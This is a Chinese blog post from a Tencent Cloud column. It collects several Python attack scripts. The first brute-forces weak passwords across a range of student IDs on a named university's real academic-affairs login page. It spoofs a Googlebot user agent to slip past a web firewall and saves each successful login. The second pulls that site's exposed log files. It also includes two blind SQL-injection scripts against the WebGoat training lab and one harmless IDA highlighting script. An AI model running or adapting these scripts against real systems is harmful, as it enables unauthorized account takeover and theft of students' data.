前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >python脚本备份

python脚本备份

作者头像
De4dCr0w
发布2019-02-27 15:37:14
6140
发布2019-02-27 15:37:14
举报
文章被收录于专栏:二进制漏洞研究

正方教务系统弱口令

代码语言:javascript
复制
#coding:utf-8
import requests

url = 'http://zfjw.tjykdxlcyxy.cn/(2izend4512fei5nhksssaw45)/default4.aspx'#天津医科大学临床医学院  正方教务处

#username = 1604020408
weak = ['000000',
'111111',
'222222',
'333333',
'444444',
'555555',
'666666',
'777777',
'888888',
'999999',
'123456',
'654321',
'qweqwe',
'123123'
]

for i in range(1604020000,1604029999):
    for j in weak:
        username = str(i)
        print username
        passwd = str(j)
        data = {
        "__VIEWSTATE":"dDwxMTE4MjQwNDc1Ozs+/qN9q0GVi7WN0iH/jz8h6QhLSvg=",
        "TextBox1":username,
        "TextBox2":passwd,
        "RadioButtonList1":"学生",
        "Button1":" 登 录 "
        }
        #cookies = {}
        headers = {"Host":"zfjw.tjykdxlcyxy.cn",
        "User-Agent":"Googlebot/2.1 (+http://www.google.com/bot.html)",
        "Referer":"http://zfjw.tjykdxlcyxy.cn/(2izend4512fei5nhksssaw45)/default4.aspx",
        "Cookie":"safedog-flow-item=",
        }
        req = requests.post(url=url,data=data,headers=headers)
        #print req.content
        if req.content.find('alert') == -1:
            f = open(username+'_'+passwd+'.txt','w')
            print >> f,req.content
            #print req.content
            f.close()

正方教务处日志下载

代码语言:javascript
复制
import requests
import datetime

begin = datetime.date(2017,5,1)
end = datetime.date(2017,5,1)

for i in range((end - begin).days+1):
    day = begin+datetime.timedelta(days=i)
    url = 'http://zfjw.tjykdxlcyxy.cn/log/%s-log.txt'%str(day)
    #print url 

    req = requests.get(url)

#print req.content

    if req.content.find('passwd') == -1:
        print day
        f = open(str(day)+".txt","w")
        print >> f,req.content
        f.close()

ida高亮call指令

代码语言:javascript
复制
from idautils import *
from idc import *

heads = Heads(SegStart(ScreenEA()),SegEnd(ScreenEA()))

functionCalls = []

for i in heads:
    if GetMnem(i) == "call":
        functionCalls.append(i)
print "Number of calls found: %d"%(len(functionCalls))

for i in functionCalls:
    SetColor(i,CIC_ITEM,0xc7fdff)

WebGoat数字盲注

代码语言:javascript
复制
import re
import requests
import time

cookies = dict(JSESSIONID='A9DDDE87B8D317640143AD42C8AB0CFB')

url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100'

#payload = "101 and 1=2"
low = 0
high = 10000
mid = 5000
payload = "101 and ((select pin from pins where cc_number='1111222233334444')="+str(mid)+")"
print payload
data = {'account_number':payload,'SUBMIT':'Go!'}
req = requests.post(url=url,data=data,cookies=cookies)
print req.content

while low <= high:#采用二分法查找
	mid = (low+high)/2
	payload = "101 and ((select pin from pins where cc_number='1111222233334444')="+str(mid)+")"
	print payload
        data = {'account_number':payload,'SUBMIT':'Go!'}
        req = requests.post(url=url,data=data,cookies=cookies)
        if req.content.find('Account number is valid.') != -1:
		print 'succeed:'+str(mid)
		break
	time.sleep(1)
	payload = "101 and ((select pin from pins where cc_number='1111222233334444')>"+str(mid)+")"
	data = {'account_number':payload,'SUBMIT':'Go!'}
	req = requests.post(url=url,data=data,cookies=cookies)
	print req.content
	if req.content.find('Invalid account number.') != -1:
		high = mid-1
	elif req.content.find('Account number is valid.') != -1:
		low = mid+1
print 'it\'s over,not found!'

WebGoat字符串盲注

代码语言:javascript
复制
import re
import requests
import time

cookies = dict(JSESSIONID='A9DDDE87B8D317640143AD42C8AB0CFB')

url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100'

#payload = "101 and 1=2"
charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
k = 1
for j in range(0,5):
	for i in charset:
		payload = "101 and (substring((select name from pins where cc_number='4321432143214321'),%d,1)='%c')"% (k,i)
		#print payload
        	data = {'account_number':payload,'SUBMIT':'Go!'}
        	req = requests.post(url=url,data=data,cookies=cookies)
		#print req.content
        	if req.content.find('Invalid account number') != -1:
			continue
		elif req.content.find('Account number is valid.') != -1:
			print i,
			k = k+1
	
print ''
print 'it\'s over,not found!'
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 正方教务系统弱口令
  • 正方教务处日志下载
  • ida高亮call指令
  • WebGoat数字盲注
  • WebGoat字符串盲注
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档